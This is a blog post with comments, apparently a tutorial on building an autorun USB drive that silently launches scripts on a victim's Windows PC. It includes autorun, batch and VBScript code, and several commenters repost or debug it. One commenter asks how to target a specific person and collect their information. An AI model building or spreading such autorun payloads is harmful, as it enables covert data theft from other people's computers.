How To Make An Auto Hacking USB Drive

This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.

U3 Universal customizer- http://www.u3community.com/vie…..¦php?t=434

Batch to exe converter – http://download.cnet.com/Bat-T…..55897.html

Nirsoft Utilities – http://www.nirsoft.net

 

AUTORUN SCRIPT:

[Autorun]

open=launch.exe -a

LAUNCH.BAT SCRIPT:

usb.vbs

USB.VBS SCRIPT:

Dim oFSO, oDrive, objFolder, oDestination, shell
Const USBDRIVE=1
oDestination = “c:test”
set oFSO = Wscript.CreateObject(“Scripting.FileSystemObject”)
Set shell=createobject(“wscript.shell”)
For Each oDrive in oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> “A” Then
shell.run oDrive.DriveLetter & “:batch.bat”
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo “Copying File”,Files
newDst=oDst&”"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
End Sub

 

Bookmark and Share

Join the forum discussion on this post

36 Responses to “How To Make An Auto Hacking USB Drive”

  1. Rolfenstein says:

    No video?

  2. Sam says:

    Do you have to to do the “.bat to .exe” step. As far as I know, they’re treated the same in Windows.
    Regardless, very nice hack for the U3 software. I never liked U3 very much, now I can replace it with PortableApps instead.

  3. Ndirqim says:

    thank you very much this tutorial was very heplful regarding security reasons . Keep up the good work !

  4. Bobby says:

    Could this same usb hack be used for stopping applications?

  5. Matt says:

    The link to the universal customizer doesn’t work.

  6. billythe says:

    Hey Tinkernut. Great job. Your videos are fantastic. I recently had a technician come and check my internet connection because it’s been running real slow. Videos take a long time to play and basically I have to pause your videos and let them load, so I can view them. The tech said there was nothing wrong with my internet speed and that it was fine. Is there a true way to check this? I run a command to ping yahoo, google and my ip, but it show no loss of data. The provider promises 7mbps and when I run 2wire speed test or speedtest.net, I a range between 1.5 to less than 3 mbps. Any response will help. Thanks a lot for your help.

  7. abed basha says:

    thanks for this tutorial

    and

    happy birthday

  8. A says:

    Well I’ll say it, I’m confused. Is this an instance where he’s saying more than he is saying? This guy is a genius for showing us regulars how to “pretend” like we’re as smart as he is. I’m thinking that this is the reason for a straight hack of any computer? Please let a dumbshit know what is going on here. I’m hoping and thinking that comments seem to be avoid of censure.

  9. David says:

    u r a genius!im 7 and i created my own website from scratch!
    dude u r my hero! but i didnt understand this!

  10. Eric says:

    Your website is down

  11. Dushan says:

    Universal customizer 1.0.0.8 is not working if you have this software please upload it & give us the link…

  12. edis.kazaz says:

    what softwere did you use to make this video,pls give me a download link

  13. Matt says:

    The link to the universal customizer doesn’t work.

  14. bharadwaj says:

    hi tinkernut..this video is very factual which gives much more inf abt the usb hacks nice work dudes….

  15. this doesnot work on other disk then scandisk drive. it is far more better if it is also applicable for other disk toooo

  16. AdmOd says:

    I prefer to Switchblade.

  17. Jake says:

    the code isnt in the forum???

  18. t3chflash says:

    I haven’t tried it, but I think the U3 launchpad can be downloaded and put on any flash drive. Great video keep em coming.

  19. Rano Veder says:

    here is the Script

    Dim oFSO, oDrive,objFolder,oDestination, shell
    Const USBDRIVE=1
    oDestination = “c:\test”
    Set oFSO = WScript.CreateObject(“Scripting.FileSystemObject”)
    Set shell=createobject(“wscript.shell”)
    ‘Get USB drive letter
    For Each oDrive In oFSO.Drives

    If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter “A” Then
    shell.run oDrive.DriveLetter & “:\batch.bat”
    set shell=nothing
    End If
    Next
    Sub CopyFiles(oPath, oDst)
    Set objFolder = oFSO.GetFolder(oPath)
    For Each Files In objFolder.Files
    WScript.Echo “Copying File”,Files
    newDst=oDst&”\”&Files.Name
    oFSO.CopyFile Files,newDst,True
    WScript.Echo Err.Description
    Next
    End Sub

    it could be that i made a mistake

  20. it guy says:

    u saw only programming a hack, but i like to see how it hacking

  21. yuki says:

    at first, thx so much for the everything,

    i got vbscript 800a0408 error for making auto hacking USB. i copied the codes from your website and directly pasted in my file. but i dunno why the error keeps coming out. i tried many times, but anything changed.

    i got error for usb.vbs file

    line: 3
    char: 16
    error: invalid character
    code: 800a0408

    can you pls help me out for this? its really appreciated

    thanks so much

  22. Darren says:

    just delete and replace all the double quotes in the script.

    Also

    If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter “A” Then

    should be

    If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter = “A” Then

  23. Evan says:

    guys, i got a problem.. is this only xp?
    on my vista after i did it no my xp, i get a .cfg file not a html file… then i cant read data… please post reply

  24. [...] USB Drive Filed Under: Uncategorized by tamtamzify — Leave a comment March 15, 2010 Tinkernut.com � Blog Archive � How To Make An Auto Hacking USB Drive. Comments RSS [...]

  25. matt says:

    well i had the same error as yuki but i dont get what you mean…..example?

  26. waelts2002 says:

    thanx for this video, its very helpful!!!!!!!!

  27. netw0rk c0d3r says:

    Thanks for the video, i like it very much and it also is very helpful…. THANKS..

  28. TOM says:

    Good job team…I lik u guyz 4 u r GOOD,NAUGTY work.. keep it up.

  29. Questionaire says:

    My computer can’t change a .txt file to a .bat or .inf. Can someone help me?!!

  30. Terry says:

    I would like to know how to send a specific person that ‘hack’ and have the ‘hack’ send me back their information. :) Thanks for considering the idea.

  31. Camaxtli says:

    what is the website url for the website at 2:36 mins.

  32. shauket says:

    plz do more for hacking!

  33. poseidon13166 says:

    hey guys I need help here. I there’s an error on usb.vbs. how can i make it work. I probably have wrong script typed. Pls help

  34. declan says:

    hi i had the same error on line 3 but i have fixed all the problems up untill i got this error

    Line : 9
    Character : 32
    Error : syntax error
    Code : 800A03EA
    By the Way Line 3 and character 32 is:

    shell.run oDrive.DriveLetter & :batch.bat
    ^
    and i dont know what to do i have tried a few things but it would be great if you guys could help me thanks alot guys :)

  35. [...] ?????, ???? ????? ??? ?? ?-DOK ???? ????? ???? ???????? (???? ?????? ???? ?"? ???? ????? ??? ??? ?? ??? ?? ????). [...]

  36. tornado says:

    how about making a ready made program so we can copy it directly from this site? thanks and more power

Use the Form Below to Leave a Reply

Your Name: (Required)

Email Address: (Required)

Website:

Your Comments: